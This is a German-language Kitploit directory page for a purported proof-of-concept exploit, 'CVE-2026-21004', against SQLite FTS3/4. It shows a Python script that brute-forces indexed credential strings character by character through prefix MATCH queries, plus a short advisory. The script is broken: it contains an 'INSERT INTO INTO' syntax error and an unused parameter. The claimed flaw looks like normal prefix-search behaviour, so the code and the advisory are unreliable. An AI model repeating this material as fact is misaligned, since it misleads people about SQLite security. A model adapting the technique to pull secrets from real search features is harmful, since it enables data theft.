Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — Proof-of-Concept-Exploit für CVE-2026-21004: nutzt präparierte SQLite-FTS3/4-MATCH-Präfixabfragen als blindes Orakel, um indizierte geheime Daten Zeichen für Zeichen wiederherzustellen. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
SchwachstellenanalyseExploitationDatenexfiltrationDatenbanksicherheit
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Proof-of-Concept-Exploit für CVE-2026-21004: nutzt präparierte SQLite-FTS3/4-MATCH-Präfixabfragen als blindes Orakel, um indizierte geheime Daten Zeichen für Zeichen wiederherzustellen.

Repository anzeigen
4vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-21004 – SQLite FTS3 Match-Informationsleck durch Query-Crafting

Programmcode (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – SQLite FTS3/4 Match-Informationsleck

Severity: High

Übersicht

Eine Anwendung, die SQLite FTS4 verwendet, stellt eine Suchfunktion bereit, die Ergebnisse basierend auf einer MATCH-Abfrage zurückgibt. Indem ein Angreifer beobachtet, ob eine Übereinstimmung auftritt (oder Zeitunterschiede), kann er den Inhalt des Volltextindex Zeichen für Zeichen per Brute-Force erraten und so sensible Daten extrahieren.

Details zur Schwachstelle

  • Typ: Informationsoffenlegung / Blinde Injektion
  • Auswirkungen: Exfiltration von Daten aus indizierten Spalten.
  • Grundursache: Der FTS-MATCH-Operator unterstützt Präfixabfragen (term*), wodurch ein Angreifer einen Wörterbuchangriff durchführen kann, ohne den vollständigen Begriff zu kennen.

Exploit-Demonstration

Führen Sie den Exploit aus:

root@kitploit:~
python sqlite_fts_leak.py

Das Skript rekonstruiert den Inhalt der Tabelle „secrets“ schrittweise.

Tool herunterladen